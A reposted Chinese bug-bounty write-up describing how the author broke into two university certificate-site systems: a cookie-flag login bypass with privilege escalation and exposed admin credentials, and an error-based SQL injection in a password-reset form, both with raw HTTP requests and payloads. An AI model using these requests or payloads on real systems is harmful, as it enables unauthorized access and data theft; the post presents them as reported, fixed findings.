记录一次成功拿下证书站挖掘过程

admin
admin
admin
139544
文章
114
评论
2024年9月30日11:40:43评论18 views字数 2774阅读9分14秒阅读模式
 

01.越权拿下某学院 

资产证明

记录一次成功拿下证书站挖掘过程

使用登录逻辑漏洞

记录一次成功拿下证书站挖掘过程

在登录框这里

记录一次成功拿下证书站挖掘过程

把0改为1

记录一次成功拿下证书站挖掘过程

成功进入后台

记录一次成功拿下证书站挖掘过程

退出后台

POST /Ajax/login.ashx?act=GetAdmin&sf_request_type=ajax HTTP/1.1Host: jagedayth.123456.comCookie: CheckCode=55381; adminid=cookie=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originContent-Length: 0Te: trailersConnection: close

记录一次成功拿下证书站挖掘过程

把cookie删除也能未授权访问

这里因为cookie没限制我设置越权

记录一次成功拿下证书站挖掘过程

admin1/123321

记录一次成功拿下证书站挖掘过程

这里是我是访问不到用户管理,只能管理学生,那么通过上一个包的接口 我尝试越权

原本是这样的包

记录一次成功拿下证书站挖掘过程

我替换一下

/Ajax/login.ashx?act=GetAdmin&sf_request_type=ajax

记录一次成功拿下证书站挖掘过程

证明越权成功

存在登录逻辑漏洞和未授权访问账户密码,垂直越权漏洞

然后拿到管理员账户 在水一波账户密码

资产证明

记录一次成功拿下证书站挖掘过程

url

https://xxxxxxxxx.com/login.html

现在管理员登录(这里不是系统管理员的)

admin1

123321

记录一次成功拿下证书站挖掘过程

证明用有管理员权限

记录一次成功拿下证书站挖掘过程

02. 注入拿下某985高校

证书站:某985大学(sql注入 深情大佬手把手教的)

资产证明,同时edu域名

记录一次成功拿下证书站挖掘过程

访问这个忘记密码

记录一次成功拿下证书站挖掘过程

这里有一个注入点

记录一次成功拿下证书站挖掘过程

POST /bsuims/bsUserPasswordResetInit.do?sectionName=passwordReset&itemName=passwordQuerySubmit HTTP/1.1Host: 985.edu.cnCookie: JSESSIONID=4ABE3725545365FDAE07177C305B0292User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------20201266305629664431108797992Content-Length: 1251Upgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="contextPath"-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="contextName"bsUserQueryPassswordPage-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="contextPara"-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="sectionName"login-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="itemName"loginAction-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="controlType"frame-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="passwordReset_userName"'-1/case when mid(user(),1,1)='a' then exp(999) else exp(1) end-'-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="passwordReset_email"aaaa-----------------------------20201266305629664431108797992Content-Disposition: form-data; name="passwordReset_idCard"aaaa-----------------------------20201266305629664431108797992--

记录一次成功拿下证书站挖掘过程

判断方式不同

记录一次成功拿下证书站挖掘过程

用bp跑一下

记录一次成功拿下证书站挖掘过程

因为有的mysql是不区分大小写的

以上漏洞 都已经修复

记录一次成功拿下证书站挖掘过程

 

原文始发于微信公众号(湘安无事):【实战挖掘】记录一次成功拿下证书站挖掘过程

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月30日11:40:43
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记录一次成功拿下证书站挖掘过程http://cn-sec.com/archives/3221407.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息